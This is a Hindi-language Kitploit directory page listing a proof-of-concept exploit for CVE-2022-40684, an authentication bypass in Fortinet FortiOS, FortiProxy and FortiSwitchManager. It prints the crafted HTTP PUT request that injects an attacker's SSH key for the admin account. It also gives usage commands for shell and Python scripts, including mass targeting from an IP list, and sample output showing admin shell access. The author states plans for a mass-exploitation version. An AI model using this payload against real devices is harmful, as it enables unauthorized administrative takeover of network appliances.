Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-40684 — Fortinet FortiOS, FortiProxy, और FortiSwitchManager में CVE-2022-40684 प्रमाणीकरण बायपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। क्राफ्टेड HTTP PUT अनुरोध के माध्यम से SSH कुंजियाँ इंजेक्ट करके एडमिन पहुँच प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/iveresk/cve-2022-40684
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubiveresk/cve-2022-40684

CVE-2022-40684

Fortinet FortiOS, FortiProxy, और FortiSwitchManager में CVE-2022-40684 प्रमाणीकरण बायपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। क्राफ्टेड HTTP PUT अनुरोध के माध्यम से SSH कुंजियाँ इंजेक्ट करके एडमिन पहुँच प्राप्त करता है।

रिपॉजिटरी देखें
113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-40684 by 1vere$k

अभी के लिए यह CVE-2022-40684 का एक POC कॉपी है जो Fortinet FortiOS, FortiProxy और FortiSwitchManager उपकरणों को प्रभावित करता है।
से कॉपी किया गया https://github.com/horizon3ai/CVE-2022-40684

विश्लेषण

एक्सप्लॉट साधारण पेलोड का उपयोग करता है:

root@kitploit:~
		PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610
        {
        "ssh-public-key1": "fake-key"
        }

सारांश

यह POC निर्दिष्ट उपयोगकर्ता के लिए SSH कुंजी सेट करने के लिए प्रमाणीकरण बाईपास भेद्यता का दुरुपयोग करता है।

भविष्य की योजनाएँ

सामूहिक एक्सप्लॉट के लिए बहु-लक्ष्यों और बहु-सर्वरों के साथ पूर्ण पैमाने के एक्सप्लॉट में विकसित करना।

CLI उपयोग

root@kitploit:~
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
 or
2. ./cve-2022-40684 <FILE_NAME>

उदाहरण:
./cve-2022-40684.sh ips.txt

PyUsage

python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub
उदाहरण:

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.
टूल डाउनलोड करें